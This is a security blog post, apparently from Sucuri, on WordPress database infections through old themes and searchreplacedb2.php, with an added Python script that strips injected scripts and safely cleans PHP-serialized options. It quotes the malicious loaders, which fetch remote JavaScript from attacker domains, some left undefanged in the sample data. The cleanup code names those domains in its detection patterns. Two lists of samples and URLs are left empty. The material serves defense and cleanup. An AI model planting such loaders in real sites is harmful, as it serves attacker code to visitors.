Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data

Over the summer we’ve seen waves of WordPress database infections that use vulnerabilities in tagDiv’s Newspaper/Newsmag themes or InterconnectIT Search and Replace scripts (searchreplacedb2.php).

The injections range from ad scripts coming from established ad networks like shorte.st to new domains created specifically for those attacks.

Typical injected scripts look like this:

<s cript type='text/javascript' src='hxxps://con1.sometimesfree[.]biz/c.js'>

Or:

var t = document.createElement("script");
t.type = "text/javascript"; t.src = "hxxps://src[.]dancewithme[.]biz/src.js";
document.head.appendChild(t);

Or:


The most noticeable malicious URLs that we’ve seen lately are:

They are all new domains registered specifically for this attack:

Malware in WordPress Database

In most cases the scripts are injected right before <a href tags in the post content (wp_posts), meaning that webmasters may need to remove multiple injected scripts from hundreds of posts in the database – definitely not a task you want to do manually!
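The two pitfalls this post names, injected scripts spread across hundreds of wp_posts rows and the same payload sitting inside PHP-serialized option values, can be handled in one cleanup routine. The following script is an added example written for this page; it is not Sucuri's tool and not code from the original post. It assumes two things: the sample post content and widget option below are constructed to mimic the injections shown above (real databases will vary), and the only indicator used is the two domains named on the page. The serialized-data part is the reason a plain search-and-replace on the raw database dump goes wrong: PHP stores strings as `s:<byte length>:"..."`, so deleting bytes from inside a string without recomputing the length makes the whole option unserializable, and WordPress silently drops it. The example parses, cleans and re-serializes instead, and shows the naive replacement failing validation next to it.

```python
import re

# The two injection domains named in the post (used only as detection indicators).
KNOWN_BAD_DOMAINS = ["sometimesfree.biz", "dancewithme.biz"]
DOMAIN_ALT = "|".join(re.escape(d) for d in KNOWN_BAD_DOMAINS)

# <script ... src='https://<sub>.<bad domain>/x.js'></script>, closing tag optional.
SRC_SCRIPT_RE = re.compile(
    rf"<script\b[^>]*\bsrc=(['\"])[^'\"]*[./](?:{DOMAIN_ALT})(?=[/'\"])[^'\"]*\1[^>]*>(?:\s*</script>)?",
    re.IGNORECASE)
# Inline loader (createElement variant) that references a bad domain in its body.
INLINE_SCRIPT_RE = re.compile(
    rf"<script\b[^>]*>(?:(?!</script>).)*?[./](?:{DOMAIN_ALT})(?=[/'\"])(?:(?!</script>).)*?</script>",
    re.IGNORECASE | re.DOTALL)


def clean_html(text: str) -> tuple[str, int]:
    """Remove script tags pointing at known-bad domains; return (cleaned text, removals)."""
    text, n1 = SRC_SCRIPT_RE.subn("", text)
    text, n2 = INLINE_SCRIPT_RE.subn("", text)
    return text, n1 + n2


def php_unserialize(data: bytes):
    """Minimal PHP unserialize() for N, b, i, d, s and a (enough for wp_options values)."""
    pos = 0

    def parse():
        nonlocal pos
        t = data[pos:pos + 1]
        if t == b"N":
            pos += 2
            return None
        if t in (b"i", b"b", b"d"):
            end = data.index(b";", pos)
            raw = data[pos + 2:end]
            pos = end + 1
            return int(raw) if t == b"i" else (raw == b"1" if t == b"b" else float(raw))
        if t == b"s":
            colon = data.index(b":", pos + 2)
            length = int(data[pos + 2:colon])     # declared BYTE length
            start = colon + 2                      # skip :"
            value = data[start:start + length]
            if data[start + length:start + length + 2] != b'";':
                raise ValueError(f"string length mismatch at offset {pos}")
            pos = start + length + 2
            return value.decode("utf-8")
        if t == b"a":
            colon = data.index(b":", pos + 2)
            count = int(data[pos + 2:colon])
            pos = colon + 2                        # skip :{
            result = {}
            for _ in range(count):
                key = parse()
                result[key] = parse()
            if data[pos:pos + 1] != b"}":
                raise ValueError(f"unterminated array at offset {pos}")
            pos += 1
            return result
        raise ValueError(f"unsupported type {t!r} at offset {pos}")

    value = parse()
    if pos != len(data):
        raise ValueError("trailing data after serialized value")
    return value


def php_serialize(value) -> bytes:
    """Inverse of php_unserialize; recomputes every s:N: length from the UTF-8 bytes."""
    if value is None:
        return b"N;"
    if isinstance(value, bool):
        return b"b:%d;" % value
    if isinstance(value, int):
        return b"i:%d;" % value
    if isinstance(value, float):
        return b"d:%s;" % repr(value).encode()
    if isinstance(value, str):
        raw = value.encode("utf-8")
        return b's:%d:"%s";' % (len(raw), raw)
    if isinstance(value, dict):
        body = b"".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return b"a:%d:{%s}" % (len(value), body)
    raise TypeError(f"cannot serialize {type(value).__name__}")


def clean_value(value):
    """Walk a decoded option and clean every string in it."""
    if isinstance(value, str):
        return clean_html(value)[0]
    if isinstance(value, dict):
        return {k: clean_value(v) for k, v in value.items()}
    return value


def naive_clean(data: bytes) -> bytes:
    """The pitfall: regex-replace on the raw serialized blob, leaving s:N: lengths stale."""
    return clean_html(data.decode("utf-8"))[0].encode("utf-8")


def safe_clean_serialized(data: bytes) -> bytes:
    """Correct approach: decode, clean the values, re-serialize with fresh lengths."""
    return php_serialize(clean_value(php_unserialize(data)))


def is_valid_serialized(data: bytes) -> bool:
    try:
        php_unserialize(data)
        return True
    except (ValueError, IndexError):
        return False


# Constructed sample post_content with both injection styles placed before <a href tags.
SAMPLE_POST = (
    "<p>Read our guide.</p>\n"
    "<script type='text/javascript' src='https://con1.sometimesfree.biz/c.js'></script>"
    '<a href="https://example.com/guide">Guide</a>\n'
    '<script>var t = document.createElement("script");\n'
    't.type = "text/javascript"; t.src = "https://src.dancewithme.biz/src.js";\n'
    'document.head.appendChild(t);</script><a href="https://example.com/about">About</a>'
)
# Constructed widget_text-style option holding the same infected HTML.
SAMPLE_OPTION = php_serialize({2: {"title": "Sidebar", "text": SAMPLE_POST}, "_multiwidget": 1})

if __name__ == "__main__":
    cleaned, removed = clean_html(SAMPLE_POST)
    print(f"post_content: removed {removed} injected script(s)")
    print("naive replace on serialized option still valid?", is_valid_serialized(naive_clean(SAMPLE_OPTION)))
    print("parse/clean/re-serialize still valid?", is_valid_serialized(safe_clean_serialized(SAMPLE_OPTION)))
```

Run `clean_html` over each `post_content` row and `safe_clean_serialized` over any `option_value` that starts with `a:` or `O:` (the parser above deliberately rejects objects so that an unexpected `O:` fails loudly rather than being corrupted). Always compare the number of removals against the rows you expected to be infected before writing anything back, and work on a copy of the database.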

Continue reading Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data at Sucuri Blog.
